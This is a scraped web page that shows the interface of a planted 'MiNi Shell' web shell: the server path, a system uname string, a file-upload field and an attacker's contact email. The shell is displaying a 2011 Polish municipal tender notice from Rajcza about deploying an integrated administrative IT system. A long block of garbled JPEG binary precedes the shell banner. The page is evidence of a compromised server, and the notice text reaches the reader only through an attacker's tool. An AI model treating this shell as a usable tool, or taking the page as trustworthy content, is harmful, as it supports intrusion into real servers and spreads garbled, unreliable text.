JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111220/432338-N-2011.html

<p class="kh_header"><b>Rajcza: Zakup licencji i wdrożenie Zintegrowanego Systemu Informatycznego Zarządzania Gminą - FRONT i BACK OFFICE w tym szkolenie użytkowników</b><br>
<b>Numer ogłoszenia: 432338 - 2011; data zamieszczenia: 20.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Rajcza , ul. Górska 1, 34-370 Rajcza, woj. śląskie, tel. 33 8643155 w. 33, faks 33 8643887.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rajcza.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup licencji i wdrożenie Zintegrowanego Systemu Informatycznego Zarządzania Gminą - FRONT i BACK OFFICE w tym szkolenie użytkowników.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest WDROŻENIE ZINTEGROWANEGO SYSTEMU ZARZĄDZANIA W JEDNOSTCE SAMORZĄDU TERYTORIALNEGO WRAZ Z MODUŁEM INTEGRUJĄCYM E-URZĄD

Zamówienie obejmuje:

Etap 1 z wymaganym terminem wykonania - do dnia 31.03.2012
-Dostawa i Instalacja oprogramowania w zakresie zgodnym z Załącznikiem nr 1 do SIWZ Szczegółowy opis przedmiotu zamówienia

Etap 2 z wymaganym terminem wykonania - do dnia 31.12.2012
-	Wdrożenie oprogramowania 
w zakresie zgodnym z Załącznikiem nr 1 do SIWZ Szczegółowy opis przedmiotu zamówienia 

Etap 3 z wymaganym terminem wykonania - do dnia 31.12.2012
-	przeprowadzenie szkoleń pracowników, którzy będą obsługiwać wdrożony system w zakresie zgodnym z Załącznikiem nr 1 do SIWZ Szczegółowy opis przedmiotu zamówienia 

Zakończenie realizacji zamówienia: do dnia  31.12.2012 roku

1.Wykonawca wykona instalację dostarczonego systemu i wszystkich związanych z nim komponentów na udostępnionej przez Zamawiającego platformie sprzętowej. 
2.Wykonawca udzieli 24 miesięcznej gwarancji na prawidłowe działanie Systemu, na warunkach określonych w Umowie będącej załącznikiem nr 5 do SIWZ. Okres gwarancji rozpoczyna się z dniem podpisania protokołu całościowego wykonania wdrożenia i oddania systemu do eksploatacji.
3.Wykonawca będzie świadczył 24 miesięczną asystę techniczną dla Systemu, na warunkach określonych w Umowie będącej załącznikiem nr 5 do SIWZ. Okres asysty technicznej rozpoczyna się z dniem podpisania protokołu całościowego wykonania wdrożenia i oddania systemu do eksploatacji.

Szczegółowy zakres przedmiotowego zamówienia zawiera załącznik nr 1 do SIWZ - 
Zakres wdrożenia powyższego Zintegrowanego Systemu Zarządzania
1.	Instalacja i konfiguracja oprogramowania na serwerze.
a.	Dostawa licencji;  
b.	Instalacja i konfiguracja elektronicznych usług publicznych na serwerze Zamawiającego;
c.	Przygotowanie serwera BAZODANIOWEGO do pracy z systemem; 
-	Weryfikacja i aktualizacja mikrokodów urządzeń (firmware):
o	BIOS;
o	Karty rozszerzeń;
o	dyski;
-	instalacja i konfiguracja oprogramowania oraz dodatkowych usług niezbędnych do prawidłowego działania systemu zintegrowanego;
-	testowanie konfiguracji; 
-	instalacja, konfiguracja i testowanie serwera bazodanowego; 
-	instalacja i konfiguracja oprogramowania do archiwizacji danych; 
-	konfiguracja harmonogramu archiwizacji systemu operacyjnego i bazy danych wraz z testowaniem konfiguracji. 
d.	Przygotowanie serwera APLIKACJI do pracy z systemem zintegrowanym 
-	Weryfikacja i aktualizacja mikrokodów urządzeń (firmware):
-	BIOS;
-	Karty rozszerzeń;
-	dyski;
-	instalacja i konfiguracja oprogramowania oraz dodatkowych usług niezbędnych do prawidłowego działania systemu zintegrowanego;
-	instalacja i konfiguracja oprogramowania do zarządzania serwerem dołączanego do serwera przez producenta;
-	testowanie konfiguracji. 
e.	Przygotowanie serwera INTERNETOWEGO
-	Weryfikacja i aktualizacja mikrokodów urządzeń (firmware):
-	BIOS;
-	Karty rozszerzeń;
-	dyski;
-	instalacja i konfiguracja oprogramowania oraz dodatkowych usług niezbędnych do prawidłowego działania systemu zintegrowanego;
-	instalacja i konfiguracja serwera www; 
-	zabezpieczenie serwera internetowego i transmisji danych z wykorzystaniem certyfikatów SSL;
-	testowanie konfiguracji;

f.	Przygotowanie komputerów 
-	Weryfikacja i aktualizacja mikrokodów urządzeń (firmware):
1.	BIOS;
2.	Karty rozszerzeń;
3.	dyski;
-	instalacja i konfiguracja oprogramowania antywirusowego oraz dodatkowych usług niezbędnych do prawidłowego działania systemu;
-	instalacja i konfiguracja poszczególnych modułów oprogramowania systemu zintegrowanego
-	testowanie konfiguracji. 

Wymagania formalno-prawne Zintegrowanego Systemu Zarządzania
Dostarczone oprogramowanie musi być zgodne z obowiązującym stanem prawnym we wszystkich dziedzinach funkcjonowania obsługiwanej przez system jednostki, w szczególności musi spełniać wszelkie wymagania stawiane normami z zakresu finansów publicznych. System musi zapewniać przestrzeganie procedur kontroli finansowej, zgodnie z obowiązującymi standardami w tym zakresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8, 48.61.00.00-7, 72.26.30.00-6, 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium wymagane w kwocie 10 500,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że wykonali należycie przynajmniej dwa zamówienia dla każdego z poniższych obszarów:
a.	Dostawa, instalacja i wdrożenie zintegrowanego systemu informatycznego wspomagającego zarządzanie jednostką administracji samorządowej, w co najmniej obszarach, takich jak: podatek od nieruchomości, rolny i leśny osób fizycznych i prawnych, system finansowo-księgowy, rejestr umów i dokumentów rozliczeniowych, obsługa kasowa, moduł współpracy z ewidencją ludności, każda o wartości co najmniej 400 000,00 zł brutto (słownie: czterysta tysięcy złotych),
b.	Dostawa, instalacja i wdrożenie platformy elektronicznej e-Urząd zgodnej z opisem przedmiotu zamówienia umożliwiającej integrację z Elektroniczną skrzynką podawczą dla jednostki samorządowej,
c.	Dostawa, instalacja i wdrożenie elektronicznego systemu zarządzania obiegiem spraw i dokumentów w jednostce administracji samorządowej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - Wykonawca musi wykazać, że dysponuje co najmniej:
a.	1 osobą, która pełnić będzie rolę kierownika projektu, posiadającą wykształcenie wyższe oraz certyfikat zawodowy z zakresu zarządzania projektami PRINCE2 Practitioner lub równoważny, wydany przez niezależną jednostkę akredytowaną do wydawania tego typu certyfikatów. Osoba ta musi mieć doświadczenie w zarządzaniu projektami w zakresie wdrażania zintegrowanych systemów informatycznych wspomagających zarządzanie jednostką administracji samorządowej, potwierdzone udziałem w co najmniej trzech takich projektach. Projekt musi polegać na wdrożeniu rozwiązania w zakresie porównywalnym z przedmiotem niniejszego zamówienia
b.	3 specjalistami, którzy będą pełnić rolę kierowników zespołów, posiadający wykształcenie wyższe oraz certyfikat zawodowy z zakresu zarządzania projektami PRINCE2 Foundation lub równoważny, wydany przez niezależną jednostkę akredytowaną do wydawania tego typu certyfikatów. Osoby te muszą mieć doświadczenie w zakresie wdrażania zintegrowanych systemów informatycznych wspomagających zarządzanie jednostką administracji samorządowej, potwierdzone udziałem w co najmniej trzech takich projektach. Projekt musi polegać na wdrożeniu rozwiązania w zakresie porównywalnym z przedmiotem niniejszego zamówienia;
c.	1 osobą pełniącą funkcję Specjalisty ds. bezpieczeństwa informacji z wykształceniem wyższym, posiadającą certyfikat Audytora wiodącego Systemu Zarządzania Bezpieczeństwem Informacji oraz doświadczenie na stanowisku związanym z zapewnieniem bezpieczeństwa informacji systemów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej.
a.	Wykonawca powinien udokumentować, że posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 500 000,00 zł (słownie: pięćset tysięcy złotych 00/100),
b.	Wykonawca powinien udokumentować, że jest ubezpieczony od odpowiedzialności cywilnej na kwotę co najmniej 500 000,00 zł (słownie: pięćset tysięcy złotych 00/100) w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	Potwierdzenie, że oferowane dostawy, usługi odpowiadają wymaganiom określonym przez zamawiającego:
a.	Certyfikat serii ISO 9001:2008w zakresie projektowania, wdrażania i utrzymywania oprogramowania wspomagającego pracę jednostek administracji publicznej lub równoważny, wydany przez jednostkę akredytowaną
b.	Certyfikat serii ISO/IEC 27001:2005w zakresie projektowania, wdrażania i utrzymywania oprogramowania wspomagającego pracę jednostek administracji publicznej lub równoważny, wydany przez jednostkę akredytowaną</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty i oświadczenia:
1/Wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - załącznik nr 2 do SIWZ.
2/Parafowany przez wykonawcę Wzór umowy- załącznik nr 5 do SIWZ.
3/Uzupełniony formularz Deklaracja funkcjonalności - załącznik nr 8 do SIWZ
4/Dowód wpłaty wadium  /ORYGINAŁ/,
5/Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakres i warunki zmiany istotnych postanowień umowy: 
Strony mogą zmienić istotne postanowienia umowy:
1)	w przypadku konieczności zmian w zakresie przedmiotu i sposobu realizacji Umowy, w tym kolejności wykonania Etapów i składających się na nie poszczególnych czynności wdrożeniowych, nie spowodowanych działaniem lub zaniechaniem którejkolwiek ze Stron Umowy, o ile zmiana taka jest korzystna dla zamawiającego lub jest konieczna w celu prawidłowego wykonania umowy, w zakresie spowodowanym zmianą;
2)	konieczności zmiany harmonogramu, terminów wykonania etapów lub terminu końcowego wykonania przedmiotu zamówienia w sytuacji, gdy z przyczyn związanych z procedurą udzielania przedmiotowego zamówienia, umowa w sprawie przedmiotowego zamówienia zostanie zawarta w terminie uniemożliwiającym realizację Umowy w pierwotnych terminach, a także z powodu okoliczności, których nie można było przewidzieć w chwili podpisania umowy; 
3)	istnieje możliwość zastosowania nowszych i korzystniejszych dla zamawiającego rozwiązań technologicznych lub technicznych, niż te istniejące w chwili podpisania umowy; 
4)	jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, a w szczególności w przypadku ustawowej zmiany podatku VAT, w zakresie spowodowanym wprowadzeniem zmian; 
5)	zachodzi konieczność zmiany w zakresie podwykonawstwa, za uprzednią zgodą zamawiającego, o ile nie jest to sprzeczne z postanowieniami SIWZ;
6)	Zmiana Umowy może nastąpić w przypadku wystąpienia siły wyższej w zakresie objętym skutkami działania siły wyższej. 
Strony nie są odpowiedzialne za skutki wynikające z działania siły wyższej, które utrudniają lub uniemożliwiają pełne lub częściowe wykonanie Umowy. Za okoliczności siły wyższej mogą być uznane tylko te, które zaistniały niezależnie od woli Stron i nie występują z winy Strony powołującej się na siłę wyższą. 
Strona zobowiązana jest niezwłocznie powiadomić drugą stronę o wystąpieniu siły wyższej, uniemożliwiającej realizację obowiązków wynikających z Umowy.
Warunki dokonywania zmian:  
1)	zmiana może być inicjowana na wniosek Zamawiającego lub Wykonawcy, przy czym strona wnioskująca zobowiązana jest do szczegółowego uzasadnienia proponowanych zmian, 
2)	zmiana musi uzyskać aprobatę obu stron, 
3)	zmiana musi być zgodna z SIWZ oraz ustawą, w tym w szczególności: 
a)	zmiana umowy nie może naruszać zasady zachowania uczciwej konkurencji oraz równego traktowania Wykonawców, 
b)	zmiana musi być wprowadzona w formie pisemnej pod rygorem nieważności, 
c)	zmiana nie może spowodować wykroczenia usługi poza przedmiot zamówienia opisany w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rajcza.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, pokój nr 24, III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2012 godzina 10:50, miejsce: j.w..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 01.02.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego  na lata  2007-2013; 
Priorytet II Społeczeństwo informacyjne; Poddziałanie 2.2. Rozwój elektronicznych usług publicznych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com